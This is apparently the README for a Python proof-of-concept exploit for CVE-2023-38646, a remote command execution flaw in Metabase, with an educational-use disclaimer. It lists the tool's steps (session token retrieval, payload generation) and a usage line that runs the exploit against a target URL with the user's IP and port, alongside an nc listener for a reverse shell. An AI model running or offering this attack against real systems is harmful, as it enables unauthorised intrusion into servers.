Proof-of-Concept script for exploiting CVE-2023-38646. Intended for educational and research purposes only.
This is a Python-based Proof-of-Concept (PoC) script to exploit CVE-2023-38646, a vulnerability affecting Metabase. The exploit abuses misconfigurations to achieve remote command execution.
This script is intended solely for educational purposes and ethical research. Misuse of this script to attack systems without prior consent is illegal and unethical. The author is not responsible for any damage caused by the use of this tool.
- Retrieves session tokens automatically
- Generates payloads for remote command execution
- Automates exploit deployment
- Python 3.7+
requestslibrary (pip install requests)
- Make sure to listen on port with nc first.
python3 exploit.py -u <target_url> -ip <your_ip> -p <your_port>